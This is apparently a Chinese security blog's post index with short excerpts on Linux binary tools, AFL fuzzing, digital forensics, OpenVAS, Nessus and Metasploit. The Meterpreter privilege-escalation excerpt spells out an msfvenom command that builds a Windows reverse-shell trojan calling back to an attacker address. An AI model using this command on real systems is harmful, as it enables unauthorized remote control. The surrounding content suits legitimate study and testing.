- 博客(22)
- 资源 (3)
- 收藏
- 关注
RSS订阅原创 每天一个linux命令(72):readelf 命令
readelf 命令名称 readelf - 显示有关ELF文件的信息。大纲 readelf [-a|--all] [-h|--file-header] [-l|--program-headers|--segments] [-S|--sec...
2019-08-23 14:51:55
1158
转载 每天一个linux命令(71):od 命令
功能说明:输出文件内容。语 法:od [-abcdfhilovx][-A <字码基数>][-j <字符数目>][-N <字符数目>][-s <字符串字符数>][-t <输出格式>][-w <每列字符数>][--help][--version][文件...]补充说明:od指令会读取所给予的文件的内容,并将其内容以八进制字码呈现...
2019-08-23 14:01:24
227
转载 每天一个linux命令(70):objdump 命令
1 objdump反汇编示例源文件main.c:/* main.c */#include <stdio.h>void swap(int* first, int* second){ int temp = *first; *first = *second; *second = temp;}int main(void){ int a ...
2019-08-23 14:00:10
804
转载 每天一个linux命令(69):ldd 命令
Linux Ldd参数说明:--version 打印ldd的版本号-v --verbose 打印所有信息,例如包括符号的版本信息-d --data-relocs 执行符号重部署,并报告缺少的目标对象(只对ELF格式适用)-r --function-relocs 对目标对象和函数执行重新部署,并报告缺少的目标对象和函数(只对ELF格式适用)--help 用法信息如果命令行中给定的...
2019-08-23 13:56:16
609
转载 AFL-fuzz技术
阅读目录编译upx 对upx进行fuzz测试 AFL运行界面: 运行结果与分析 编译afl版的qemu 对readelf进行fuzzafl-fuzz技术初探参考了:http://pwn4.fun/2017/09/21/AFL%E6%8A%80%E6%9C%AF%E4%BB%8B%E7%BB%8D/http://blog.csdn.net/youkawa/article...
2019-08-23 13:51:34
1694
1
原创 Android ADB
Android 调试桥Android 调试桥 (adb) 是一个通用命令行工具,其允许您与模拟器实例或连接的 Android 设备进行通信。它可为各种设备操作提供便利,如安装和调试应用,并提供对 Unix shell(可用来在模拟器或连接的设备上运行各种命令)的访问。该工具作为一个客户端-服务器程序,包括三个组件:客户端,该组件发送命令。客户端在开发计算机上运行。您可以通过发出 adb 命...
2019-08-15 14:41:34
280
原创 X-Ways Forensics: 综合取证分析工具
X-Ways Forensics: 综合取证分析工具X-Ways Forensics 是为计算机取证分析人员提供的一个功能强大的、综合的取证、分析软件,可在 Windows XP/2003/Vista/2008/7/8/8.1/2012/10操作系统下运行,支持32 /64 位, Standard/PE/FE等版本。(Windows FE is describedhere,hereand...
2019-08-15 10:21:59
11672
转载 手机取证技术路线图
Andriod手机取证的难度,其实在于一个门槛。最高人民检察院司法鉴定中心是国家级司法鉴定中心,他们对手机取证的总结,还是挺全面和震撼的。感谢本图原创作者:Friez Wittenfeld。图片较大、较长,请您受累把手机横起来看。【编者注】1、本图是取证(鉴定)人员实施手机取证的工作指引图。2、本指引未涉及手机取证后的数据分析和证据筛选等过程。3、本...
2019-08-15 10:05:44
3491
转载 Linux安装、使用Sleuth kit/Autopsy(分析磁盘映像和恢复文件的开源取证工具)
SIFT 是一个由 SANS 公司提供的基于Ubuntu的取证发行版。它包含许多取证工具,如 Sleuth kit/Autopsy 。但 Sleuth kit/Autopsy 可以直接在 Ubuntu 或Fedora发行版本上直接安装,而不必下载 SIFT 的整个发行版本。Sleuth Kit/Autopsy 是一个开源的电子取证调查工具,它可以用于从磁盘映像中恢复丢失的文件,以及为了特...
2019-08-13 16:45:21
4082
2
转载 取证分析实践之Autopsy
0X01什么是AutopsyAutopsyForensic Browser是数字取证工具-TheSleuthKit(TSK)的图形界面,一个用来分析磁盘映像和恢复文件的开源取证工具。提供在磁盘映像中进行字符串提取,恢复文件,时间轴分析,chrome,firefox等浏览历史分析,关键字搜索和邮件分析等功能。0X02什么是dftt网址:http://dftt.sourceforg...
2019-08-13 16:27:37
3209
转载 计算机取证工具
计算机取证是与计算机和网络犯罪有关的,一门非常重要的计算机学科分支。在早前,计算机只用于生成数据,但现在已扩展到与数字数据相关的所有设备。计算机取证的目标是通过使用数字资料的证据来进行犯罪调查,以找出网络相关罪行的主要责任人。为了更好的用于研究和调查,开发人员创建了多样的计算机取证工具。公安部门和调查机构可以根据自身情况,如预算和现有专家队伍等因素,来选取合适的取证工具。这些电脑取证工具,...
2019-08-13 14:29:59
3061
原创 Autopsy User Documentation
Autopsy User Documentation 4.12.0 Graphical digital forensics platform for The Sleuth Kit and other tools. MainPage RelatedPagesAutopsy User's GuideOverviewThis is the User's Gu...
2019-08-13 11:10:47
234
翻译 Openvas
安装过程中给出的Backtrack的官方网站 http://www.backtrack-linux.org/wiki/index.php/OpenVas。只要按照步骤。现在我们开始进入我们的话题,如何通过OpenVAS进行漏洞评估。要运行OpenVAS,在msfconsole输入load openvas,它会从它的数据库中加载并打开VAS插件。现在,输入openvas_help,...
2019-08-12 16:51:02
4133
转载 Meterpreter提权详解
0x01 Meterpreter自动提权1.生成后门程序我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马:msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe这里我们为生成的木马指定了payload为:windo...
2019-08-08 15:04:04
3216
转载 Meterpreter命令详解
0x01初识Meterpreter1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
2019-08-08 14:52:49
13082
原创 Meterpreter -- Python Extension Examples
Here are some examples of the Python Extension in action. With time more functionality will be added, making the extension an even more powerful tool.With the extension loaded, we can use basic Pyth...
2019-08-08 14:35:25
218
原创 Meterpreter Basic Commands
UsingMeterpreter CommandsSince theMeterpreterprovides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help familiarize you with this most powe...
2019-08-08 14:32:59
404
原创 Nessus官网资料
欢迎 扫描 设置 其他资源 PDF欢迎 入门 导航Nessus 系统要求 管理SSL证书 安装Nessus 升级Nessus 配置Nessus 管理激活码 管理Nessus离线 删除Nessus 最近查看的主题安装N...
2019-08-08 12:00:36
1462
转载 Metaspolit下如何使用Nessus
1.登录!以及之前的准备当然,首先你还是需要先下载好Nessus,我的实验是发现不下载的话我无法开启一些列服务的,Metasploit应该只是调用了它的一个接口吧!(如果有错误欢迎指正!),具体需要如何配置请看我之前的文章http://blog.csdn.net/qq_35078631/article/details/76160336万物之始我们需要开启Nessus服务,然后使用M...
2019-08-06 15:21:04
812
转载 Nessus配置
参考:https://wizardforcel.gitbooks.io/daxueba-kali-linux-tutorial/content/27.html学习到扫描漏洞工具的时候,见到了Nessus,现在讲一下如何配置吧(环境ubuntu 16.04 STL)1.下载deb文件首先需要下载需要的deb文件,需要结合自己的操作系统类型版本下载地址:http://www.tenab...
2019-08-06 15:15:54
972
转载 Metasploit在ubuntu系统下的安装配置
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的有效性,并对审计目标的安全性进行评估,提供真正的有效的安全风险评估。Metasploit目前主要是社区版metasploit framework和企业版metasploit pro,企业版为linux的bin文件和windows的二进制文件,一键式安装,就不多说,我们主要讲一下metaspl...
2019-08-06 13:58:20
853
转载 汇编语言笔记(全)
汇编语言最近系统的学了下汇编语言,下面是学习笔记,用的书是清华大学出版社出版的汇编语言第三版,作者王爽(最经典的那版)。汇编语...
2019-08-01 11:40:05
37717
38
XCL206器件说明文档
2019-01-16
THreadX源代码
2017-05-12
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人